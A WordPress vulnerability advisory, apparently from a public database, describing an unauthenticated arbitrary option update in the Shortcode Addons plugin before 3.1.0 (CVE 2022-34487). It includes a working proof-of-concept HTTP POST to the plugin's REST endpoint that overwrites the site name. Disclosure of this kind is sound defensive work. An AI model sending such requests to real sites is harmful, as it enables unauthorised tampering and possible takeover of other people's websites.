Shortcode Addons < 3.1.0 – Unauthenticated Arbitrary Option Update | CVE 2022-34487 | Plugin Vulnerabilities

Description

The plugin does not have any authorisation in its REST API endpoint, one of them could allow unauthenticated attackers to update arbitrary blog options.

Proof of Concept

POST /wp-json/ShortCodeAddonsUltimate/v2/addons_settings HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 69
Connection: close

rawdata=%7B%22name%22%3A%22blogname%22%2C%22value%22%3A%22Owned%22%7D

Affects Plugins

shortcode-addons

Fixed in 3.1.0

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

10.0 (critical)

Miscellaneous

Original Researcher

m0ze

Verified

Yes

WPVDB ID

c8dd91d5-fdc4-4852-9823-6d0047b214fe

Timeline

Publicly Published

2021-12-21 (about 4 years ago)

Added

2021-12-21 (about 4 years ago)

Last Updated

2022-08-25 (about 3 years ago)

Other

Published

Title

Published

2025-12-17

Title

Download Manager < 3.3.33 - Missing Authorization to Authenticated (Subscriber+) Media Attachment Password Disclosure

Published

2024-04-16

Title

WP Cookie Consent ( for GDPR, CCPA & ePrivacy ) < 3.1.0 - Missing Authorization to Unauthenticated Arbitrary Post Deletion

Published

2022-08-06

Title

ActiveDEMAND plugin < 0.2.28 - Unauthenticated Post Creation/Update/Deletion

Published

2025-11-21

Title

IDonate – Blood Donation, Request And Donor Management System < 2.1.16 - Missing Authorization to Unauthenticated Arbitrary Post Deletion

Published

2025-12-04

Title

Voidek Employee Portal < 1.0.8 - Missing Authorization